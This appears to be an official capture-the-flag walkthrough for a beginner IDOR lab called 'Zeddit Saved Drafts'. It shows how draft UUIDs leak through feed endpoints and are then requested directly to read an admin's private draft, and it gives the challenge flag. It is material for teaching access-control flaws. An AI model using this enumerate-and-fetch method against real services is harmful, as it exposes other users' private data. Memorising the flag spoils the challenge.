HACKR.GG
hackr.gg — Zeddit — Saved Drafts Walkthrough
Save as PDF ↓
hackr.gg
— Official Walkthrough
Confidential · Educational Use Only
Zeddit — Saved Drafts
IDOR & Access Control · Insecure Direct Object Reference (IDOR)
Difficulty
Beginner
Vuln class
Insecure Direct Object Reference (IDOR)
Steps
3
// Objective
Access another user's private saved draft by manipulating the draft ID in the API.
// Tools required
Browser
Burp Suite
DevTools
// Step-by-step walkthrough
1
Create and view your own draft
Log in and save a post as a draft. Open DevTools → Network tab and find the API call that fetches it. Note the UUID in the request.
Command / Input
GET /api/drafts/a1b2c3d4-...
2
Enumerate other draft IDs
The draft IDs are UUIDs — large but they leak in API responses. Check the "recent drafts" or shared posts endpoint for other users' draft IDs.
⚑ Look in the /api/feed or /api/posts/pending endpoint responses — other users' draft UUIDs may appear.
3
Access the admin draft
Use the leaked draft UUID to fetch the admin's private draft directly.
Command / Input
GET /api/drafts/ADMIN_DRAFT_UUID
Output
{"content":"HackrGG{z3dd1t_dr4ft_1d0r_4dm1n_l34k}","author":"admin"}
// Flag
Flag value
HackrGG{z3dd1t_dr4ft_1d0r_4dm1n_l34k}
Inside the admin's private draft — accessible without authorization check.
